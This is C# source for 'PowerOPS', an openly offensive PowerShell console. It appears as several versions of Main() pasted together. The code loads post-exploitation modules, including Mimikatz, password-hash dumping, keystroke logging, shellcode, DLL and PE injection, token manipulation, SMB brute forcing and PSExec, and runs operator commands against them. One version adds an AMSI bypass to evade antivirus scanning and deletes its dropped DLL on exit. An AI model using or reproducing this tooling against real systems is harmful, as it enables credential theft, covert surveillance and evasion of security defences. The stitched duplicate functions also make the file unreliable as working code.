public void ExecuteSynchronously(string PSfunction)
{
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(PowerOPS.PowerView());
pipeline.Commands.AddScript(PowerOPS.PowerUp());
pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation());
pipeline.Commands.AddScript(PowerOPS.AutoGPP());
pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes());
pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan());
pipeline.Commands.AddScript(PowerOPS.Mimikatz());
pipeline.Commands.AddScript(PowerOPS.InvokeShellcode());
pipeline.Commands.AddScript(PowerOPS.InvokePEInjection());
pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection());
pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy());
pipeline.Commands.AddScript(PowerOPS.TokenManipulation());
pipeline.Commands.AddScript(PowerOPS.InvokeWMI());
pipeline.Commands.AddScript(PowerOPS.InvokePSExec());
pipeline.Commands.AddScript(PowerOPS.PowerCat());
pipeline.Commands.AddScript(PSfunction);
pipeline.Commands.Add("Out-String");
Collection <PSObject> results = pipeline.Invoke();
runspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.AppendLine(obj.ToString());
}
Console.Write(stringBuilder.ToString());
}
public static void Main()
{
Console.Title = "PowerOPS - [email protected]";
Console.SetWindowSize(Math.Min(122, Console.LargestWindowWidth), Math.Min(40, Console.LargestWindowHeight));
Console.SetBufferSize(Console.BufferWidth, Console.BufferHeight);
string command = null;
DisplayBanner();
Console.WriteLine("Type 'show' to list available modules\n");
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
do
{
Console.Write("PS > ");
command = Console.ReadLine();
switch (command)
{
case "show":
DisplayModules();
break;
case "exit":
return;
default:
if (command.IndexOf("Invoke-Mimikatz", StringComparison.OrdinalIgnoreCase) == 0)
{
if (!IsUserAdministrator())
{
break;
}
}
if (command.IndexOf("Get-PassHashes", StringComparison.OrdinalIgnoreCase) == 0)
{
if (!IsUserAdministrator())
{
break;
}
}
if (command.IndexOf("Invoke-Shellcode", StringComparison.OrdinalIgnoreCase) == 0)
{
if (!isArch_x86())
{
break;
}
}
try
{
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(PowerOPS.GetKeyStrokes());
pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection());
pipeline.Commands.AddScript(PowerOPS.InvokeMimikatz());
pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy());
pipeline.Commands.AddScript(PowerOPS.InvokeReflectivePEInjection());
pipeline.Commands.AddScript(PowerOPS.InvokeShellcode());
pipeline.Commands.AddScript(PowerOPS.InvokeTokenManipulation());
pipeline.Commands.AddScript(PowerOPS.InvokeWMICommand());
pipeline.Commands.AddScript(PowerOPS.PowerUp());
pipeline.Commands.AddScript(PowerOPS.PowerView());
pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation());
pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes());
pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan());
pipeline.Commands.AddScript(PowerOPS.AutoGPPPassword());
pipeline.Commands.AddScript(PowerOPS.PowerCat());
pipeline.Commands.AddScript(PowerOPS.GetProductKey());
pipeline.Commands.AddScript(PowerOPS.Empire_InvokePSExec());
pipeline.Commands.AddScript(PowerOPS.Empire_InvokeSshCommand());
pipeline.Commands.AddScript(command);
pipeline.Commands.Add("Out-String");
Collection <PSObject> results = pipeline.Invoke();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.AppendLine(obj.ToString());
}
Console.Write(stringBuilder.ToString());
}
catch (Exception e)
{
Console.WriteLine("{0}", e.Message);
}
break;
}
} while (command != "exit");
runspace.Close();
Environment.Exit(0);
}
public static void Main()
{
Console.Title = "PowerOPS - [email protected]";
Console.SetWindowSize(Math.Min(122, Console.LargestWindowWidth), Math.Min(40, Console.LargestWindowHeight));
Console.SetBufferSize(Console.BufferWidth, Console.BufferHeight);
// Amsi bypass technique from: http://cn33liz.blogspot.co.uk/2016/05/bypassing-amsi-using-powershell-5-dll.html
string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
amsibypass.Amsi(Arch);
string command = null;
DisplayBanner();
Console.WriteLine("Type 'show' to list available modules\n");
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
do
{
Console.Write("PS > ");
command = Console.ReadLine();
switch (command)
{
case "show":
DisplayModules();
break;
case "exit":
string path = Directory.GetCurrentDirectory();
if (File.Exists(path + "\\Amsi.dll"))
{
File.Delete(path + "\\Amsi.dll");
}
runspace.Close();
Environment.Exit(0);
return;
default:
if (command.IndexOf("Invoke-Mimikatz", StringComparison.OrdinalIgnoreCase) == 0)
{
if (!IsUserAdministrator())
{
break;
}
}
if (command.IndexOf("Get-PassHashes", StringComparison.OrdinalIgnoreCase) == 0)
{
if (!IsUserAdministrator())
{
break;
}
}
if (command.IndexOf("Invoke-Shellcode", StringComparison.OrdinalIgnoreCase) == 0)
{
if (!isArch_x86())
{
break;
}
}
try
{
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(PowerOPS.GetKeyStrokes());
pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection());
pipeline.Commands.AddScript(PowerOPS.InvokeMimikatz());
pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy());
pipeline.Commands.AddScript(PowerOPS.InvokeReflectivePEInjection());
pipeline.Commands.AddScript(PowerOPS.InvokeShellcode());
pipeline.Commands.AddScript(PowerOPS.InvokeTokenManipulation());
pipeline.Commands.AddScript(PowerOPS.InvokeWMICommand());
pipeline.Commands.AddScript(PowerOPS.PowerUp());
pipeline.Commands.AddScript(PowerOPS.PowerView());
pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation());
pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes());
pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan());
pipeline.Commands.AddScript(PowerOPS.AutoGPPPassword());
pipeline.Commands.AddScript(PowerOPS.PowerCat());
pipeline.Commands.AddScript(PowerOPS.Empire_InvokePSExec());
pipeline.Commands.AddScript(PowerOPS.Empire_InvokeSshCommand());
pipeline.Commands.AddScript(PowerOPS.InvokeMimikittenz());
pipeline.Commands.AddScript(PowerOPS.PowerUpSQL());
pipeline.Commands.AddScript(PowerOPS.InvokeSMBAutoBrute());
pipeline.Commands.AddScript(command);
pipeline.Commands.Add("Out-String");
Collection <PSObject> results = pipeline.Invoke();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.AppendLine(obj.ToString());
}
Console.Write(stringBuilder.ToString());
}
catch (Exception e)
{
Console.WriteLine("{0}", e.Message);
}
break;
}
} while (command != "exit");
}
